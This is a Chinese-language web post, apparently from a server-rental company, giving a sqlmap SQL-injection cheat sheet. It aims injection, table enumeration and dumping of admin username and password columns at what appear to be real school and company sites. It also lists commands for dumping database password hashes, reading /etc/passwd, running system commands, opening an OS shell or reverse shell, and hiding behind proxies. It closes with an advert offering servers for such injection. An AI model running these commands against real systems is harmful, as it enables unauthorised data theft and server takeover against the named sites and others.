< 返回新闻公共列表

sqlmap post注入案例 sqlmap常用指令和参数

发布时间:2018-01-08
sqlmap post注入案例 sqlmap常用指令和参数
检查注入点 sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21" 列数据库信息 sqlmap -u  "http://www.scshlx.com/TeachView.asp?id=21" --dbs 指定库名列出所有表 //最大搜索线程为10 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables 指定库名表名列出所有字段 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33"  -T "双引号下为指定表名admin" --columns 指定库名表名字段名dump出指定字段的内容 sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password" 查询表名下所有字段 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns Mysql注入(有多个库 必须找到有管理员的数据库) --is-dba  当前用户权限 --dbs  所有数据库 --current-db   网站当前数据库 --users  所有数据库用户 --current-user   当前数据库用户 --tables-D"当前数据库名字"  查表名、 -T"指定的表名"-D"当前数据库名字"--columns 查字段 Cookie注入(遇到防注入) sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2    列表名等 在上方代码后面加--tables等;    eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username" 有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档: –cookie=COOKIE在需要登录的地方,需要登录后的cookie –proxy=”http://127.0.0.1:8087″   使用HTTP代理隐藏自己的身份,比如使用goagent等 –sql-query=QUERY  执行一个sql语句,不一定支持 sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型 sqlmap -u “http://url/news?id=1″ -- users 列数据库用户 sqlmap -u “http://url/news?id=1″ -- dbs   列数据库 sqlmap -u “http://url/news?id=1″ -- passwords 数据库用户密码 sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用户 数据库密码 sqlmap  -u  “http://url/news?id=1″   -- dump  -C  “password,user,id”  -T “tablename”-D “db_name” –start 1 –stop 20 #列出指定字段,列出20 条 sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有数据库所有表 sqlmap -u “http://url/news?id=1″ -- privileges #查看权限 sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色 sqlmap -u “http://url/news?id=1″ -- udf-inject #导入用户自定义函数(获取 系统权限!) sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出当前库所有表 sqlmap -u “http://url/news?id=1″ -- union-cols #union 查询表记录 sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入 sqlmap -u “http://url/news?id=1″ -- b #获取banner信息 sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入 sqlmap -u “http://url/news?id=1″ - v 1 -f #指纹判别数据库类型 sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入 sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定关键词 sqlmap -u “http://url/news?id=1″ -- sql-shell #执行指定sql命令 sqlmap -u “http://url/news?id=1″ -- file /etc/passwd sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #执行系统命令 sqlmap -u “http://url/news?id=1″ -- os-shell #系统交互shell  sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell sqlmap -u “http://url/news?id=1″ -- reg-read #读取win系统注册表 sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存进度 sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢复 已保存进度 香港未来云海外服务器支持sqlmap post注入,欢迎广大用户联系24小时在线客服租用

/../template/Home/mama/PC/Static